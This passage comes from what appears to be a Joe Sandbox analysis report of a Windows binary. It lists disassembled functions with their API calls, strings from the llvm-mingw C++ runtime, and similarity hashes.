_Unwind_Resume, xrefs: 00007FF6099B40E6

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fflush$Unwindabort
String ID: _Unwind_Resume$_Unwind_Resume() can't return$libunwind: %s - %s$libunwind: _Unwind_Resume(ex_obj=%p)
API String ID: 3252057912-3900785416
Opcode ID: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction ID: a6df5b29c5f13cf7c1ff9f024a0674de0c746314a32dae05ee0afa45c6d102c2
Opcode Fuzzy Hash: 67d0ddd8d3f3b324f54b87a857e904e5ecbaa43cf9483693f48d384fd3c00ca7
Instruction Fuzzy Hash: 70415B21D0DBC182F6369B15A5063F9A375FFE9384F145226EA8802766EF7DD2D28740

Function 00007FF6099B45B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF6099B46AC
abort.MSVCRT ref: 00007FF6099B46B1

Strings

setReg, xrefs: 00007FF6099B47D3
getReg, xrefs: 00007FF6099B468C
libunwind: %s - %s, xrefs: 00007FF6099B4685, 00007FF6099B47CC
unsupported register, xrefs: 00007FF6099B4693, 00007FF6099B47DA

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: abortfflush
String ID: getReg$libunwind: %s - %s$setReg$unsupported register
API String ID: 4129902348-1024193272
Opcode ID: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction ID: 781f2fb296e5af16798e7065be9fca56be2e43d8ac82bc8e07890187366914f9
Opcode Fuzzy Hash: 5b2f10e133d415561be2da49aee555f4cb851904708bcff335edbf3d1aada5b7
Instruction Fuzzy Hash: 52112E50E0B91B91EA14FFA5E9D62B81727DF84782F688436C50D933A7EE3CA501C301

Function 00007FF6099C2797 Relevance: 13.6, APIs: 9, Instructions: 95COMMON

Download Yara Rule

APIs

isxdigit.MSVCRT ref: 00007FF6099C27B2
isxdigit.MSVCRT ref: 00007FF6099C27C4
isxdigit.MSVCRT ref: 00007FF6099C27D6
isxdigit.MSVCRT ref: 00007FF6099C27E8
isxdigit.MSVCRT ref: 00007FF6099C27FA
isxdigit.MSVCRT ref: 00007FF6099C280C
isxdigit.MSVCRT ref: 00007FF6099C281E
isxdigit.MSVCRT ref: 00007FF6099C2830
malloc.MSVCRT ref: 00007FF6099C287D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: isxdigit$malloc
String ID:
API String ID: 1399014089-0
Opcode ID: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
Instruction ID: 3c73cc75b7f63bf808cba69d6c2425b02755dc5ce8ea8f375f734f3a31d786d0
Opcode Fuzzy Hash: d11516b59d51969ee5f2a2bb7cdc1212a3f385caa4d96bde6dca3ab53278bab5
Instruction Fuzzy Hash: 9F41BE62608B8642FB594F24D89037E67A1FB40F41F6C4535CBAD86BA6EF7CE4A1C310

Function 00007FF6099CB110 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 183COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CB24B
realloc.MSVCRT ref: 00007FF6099CB2C5

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099CB41D
allocator, xrefs: 00007FF6099CB302, 00007FF6099CB347
starts_with(SV, "basic_"), xrefs: 00007FF6099CB416
basic_string, xrefs: 00007FF6099CB2FB, 00007FF6099CB340

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: mallocrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
API String ID: 948496778-4167058683
Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction ID: 7bf4aabecc61c1b13fb117b854ac205085046fba6994bcab3b55a1cbb8147947
Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction Fuzzy Hash: B261F6B2A06B8682EF148F15E8946BC77A6EB14784F6C8631DB5D47792DF3CE552C300

Function 00007FF6099CB520 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CB55B
realloc.MSVCRT ref: 00007FF6099CB5D1
memcpy.MSVCRT ref: 00007FF6099CB5EF
realloc.MSVCRT ref: 00007FF6099CB62E
realloc.MSVCRT ref: 00007FF6099CB694
realloc.MSVCRT ref: 00007FF6099CB6F3

Strings

or<char>, xrefs: 00007FF6099CB6B0

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$memcpy
String ID: or<char>
API String ID: 1833655766-3520798227
Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction ID: 21eb3e16684f093fde776dace9ab83537378f61d3890477b41f9e2799d4c7aa7
Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction Fuzzy Hash: 7C5173B2A06B8683DE25CF55E550269B366EB94BC4F54C531DB8E47792EF3CE191C300

Function 00007FF6099B7F50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6099B804A
_assert.MSVCRT ref: 00007FF6099B809B
calloc.MSVCRT ref: 00007FF6099B80DD
memset.MSVCRT ref: 00007FF6099B8106

Strings

reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0, xrefs: 00007FF6099B8036
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp, xrefs: 00007FF6099B803D, 00007FF6099B808E
reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0, xrefs: 00007FF6099B8087

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assert$callocmemset
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/fallback_malloc.cpp$reinterpret_cast<size_t>(p + 1) % RequiredAlignment == 0$reinterpret_cast<size_t>(ptr) % RequiredAlignment == 0
API String ID: 1513271871-212362933
Opcode ID: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction ID: fc322b9411d7d9cb1c2885646a347b4e2c0c2994e77a62659c6ccb121f1fef00
Opcode Fuzzy Hash: dbf2372e7721cb1b03cfe6cbe79d7301f27338ad5526d3f9cf38ec1b38bf5fea
Instruction Fuzzy Hash: E341B111F1A52680FB159F16EA516B92377AF84BC0F694131CD0E83BEAEE3DA946C300

Function 00007FF6099B2730 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,?,?,00007FF6099DFEF8,00007FF6099DFEF8,?,?,00007FF6099B0000,?,00007FF6099B2521), ref: 00007FF6099B27F3
VirtualProtect.KERNEL32(?,?,?,?,00007FF6099DFEF8,00007FF6099DFEF8,?,?,00007FF6099B0000,?,00007FF6099B2521), ref: 00007FF6099B2857
memcpy.MSVCRT ref: 00007FF6099B2870
GetLastError.KERNEL32(?,?,?,?,00007FF6099DFEF8,00007FF6099DFEF8,?,?,00007FF6099B0000,?,00007FF6099B2521), ref: 00007FF6099B28B3

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FF6099B28B9
Address %p has no image-section, xrefs: 00007FF6099B2884
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF6099B28A7

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuerymemcpy
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 2595394609-2123141913
Opcode ID: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction ID: 139db8d6973f2bc35516744b917c89598ef37b325e5b474e2d0a91c0c5f03e44
Opcode Fuzzy Hash: 9138589ab96e5059ed5b91dbf10de36bae820b7dd10cec232302c703205bbebd
Instruction Fuzzy Hash: 8641AE61A09A0681FA618F16D9846BD37B2FF94B90F784536CE1EC37A2DE3CE546C300

Function 00007FF6099CB372 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CB3E6
memcpy.MSVCRT ref: 00007FF6099CB400
_assert.MSVCRT ref: 00007FF6099CB42A

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099CB41D
starts_with(SV, "basic_"), xrefs: 00007FF6099CB416
basic_ostream, xrefs: 00007FF6099CB377
basi, xrefs: 00007FF6099CB39A

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_ostream$starts_with(SV, "basic_")
API String ID: 2326172077-1855325571
Opcode ID: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction ID: 235e91e22f631beeab780f7a57d804db5707db9794fc7ea16bef69bb9c3e762e
Opcode Fuzzy Hash: daff190b208ee239b92a8ff6802495cf067ff4514613a718e17146f5ae89fa4f
Instruction Fuzzy Hash: 771194F2F0A60282EA648F05F98036963A3EF647C1F588435CA4D47B96EF2CE551C300

Function 00007FF6099B1880 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 33COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF6099B1C09), ref: 00007FF6099B19EF
_assert.MSVCRT ref: 00007FF6099B1A08

Strings

actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND), xrefs: 00007FF6099B215B
actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND), xrefs: 00007FF6099B2141
actions & _UA_SEARCH_PHASE, xrefs: 00007FF6099B2175
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6099B19FB, 00007FF6099B2148, 00007FF6099B2162, 00007FF6099B217C
(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF6099B19F4

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp$actions & (_UA_SEARCH_PHASE | _UA_FORCE_UNWIND)$actions & (_UA_SEARCH_PHASE | _UA_HANDLER_FRAME | _UA_FORCE_UNWIND)$actions & _UA_SEARCH_PHASE
API String ID: 1072228434-30274522
Opcode ID: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction ID: e39808a7f32fd1f000df75f8c018e007b0b9a415aa5ab1b9e53d89fa9b78a54e
Opcode Fuzzy Hash: 446287974f43067f5742b1829c412f7f497fe5859eb705efff3feace76f7cb6b
Instruction Fuzzy Hash: ABF0E923E1E40690EA249F96ECC14B41326AF15755F790531DD1DC33D6ED3CD44AC200

Function 00007FF6099C4BE0 Relevance: 12.2, APIs: 8, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C4C16
realloc.MSVCRT ref: 00007FF6099C4D5F
realloc.MSVCRT ref: 00007FF6099C4DB9
memcpy.MSVCRT ref: 00007FF6099C4DD7
realloc.MSVCRT ref: 00007FF6099C4E3C
realloc.MSVCRT ref: 00007FF6099C4EB0
memcmp.MSVCRT ref: 00007FF6099C4EE5
realloc.MSVCRT ref: 00007FF6099C4F25

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcmpmemcpy
String ID:
API String ID: 2517790541-0
Opcode ID: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction ID: d95b70461940d0bcae3481084cf7ae82b5ea8e9d6948d31969257ccb878e5284
Opcode Fuzzy Hash: 7346dd3206704345a6af56fcc80ff1099bfbb1bfe8e3ddd91a199a9fc1cc2900
Instruction Fuzzy Hash: E59184B2A06B8283EB258F16E8543A963A5FB54B84F188531DF9D477A2EF3CE5518300

Function 00007FF6099C5480 Relevance: 12.2, APIs: 8, Instructions: 222COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C54BF
realloc.MSVCRT ref: 00007FF6099C550E
realloc.MSVCRT ref: 00007FF6099C5568
realloc.MSVCRT ref: 00007FF6099C55C6
realloc.MSVCRT ref: 00007FF6099C5623
realloc.MSVCRT ref: 00007FF6099C5670
realloc.MSVCRT ref: 00007FF6099C56FC
realloc.MSVCRT ref: 00007FF6099C5757

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction ID: d90d9d187ee1e9871a303fb24690e4a366cd575af84542864b1a0af962edfcfc
Opcode Fuzzy Hash: 820f43f822463fb6ccee1dd20fe9ec16f7cf86f838d61afeeac975018113ba4f
Instruction Fuzzy Hash: 3B9163B2A0AB4283EA258F56F45436DB3A6EB687C0F558531DB9E477A1EF3CE4458300

Function 00007FF6099B71C0 Relevance: 10.9, APIs: 7, Instructions: 368COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF6099B7424
fputwc.MSVCRT ref: 00007FF6099B743B
fputwc.MSVCRT ref: 00007FF6099B74B0

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fputwc
String ID:
API String ID: 761389786-0
Opcode ID: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction ID: a918231ab17ea3cb2405bfa41467a365fd01355f468b0531fc7b6e8e3cca0e15
Opcode Fuzzy Hash: 5170ea0f942b3d93673314322599268af59ede64674dcde32236e23149b41f4c
Instruction Fuzzy Hash: 9EE14572A1920287E7748E56E25473E76F3EB94751F285239DB5AC6F92DE2CF440C700

Function 00007FF6099BF9C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099BFAD8
realloc.MSVCRT ref: 00007FF6099BFB7A
malloc.MSVCRT ref: 00007FF6099BFCAA
malloc.MSVCRT ref: 00007FF6099BFD21
memcpy.MSVCRT ref: 00007FF6099BFD3C

Strings

auto, xrefs: 00007FF6099BFD04

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpyrealloc
String ID: auto
API String ID: 2642181057-1723475450
Opcode ID: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction ID: 0496a72f65a0862d27b6a29f4c78f7b298d9fc14c7dc13a039477d49776511c6
Opcode Fuzzy Hash: d68e97057976446f2cce18955a4260cb645a2ea6946946f02118f0da23deb918
Instruction Fuzzy Hash: 9FA1096260AB8181EB249F25DA443BD77A6EB04790F584236CBAD873D3EF7CE595C300

Function 00007FF6099D1280 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF6099D1451

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction ID: 8d42fcff595458e712f4baab1791a8890100ef38c8d968f3d23509b6e1a1efd9
Opcode Fuzzy Hash: 91fbf0612a32bf460f63d29e70cfa5a713f3c52a70bc57ccc4705e96ca3739cc
Instruction Fuzzy Hash: EE71AE63F0E18246F7798E26E5C177966D3AF19754F2C5231CA6A96BC3DE3CE8818700

Function 00007FF6099CDEF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CDF1C
realloc.MSVCRT ref: 00007FF6099CDFE8
realloc.MSVCRT ref: 00007FF6099CE042
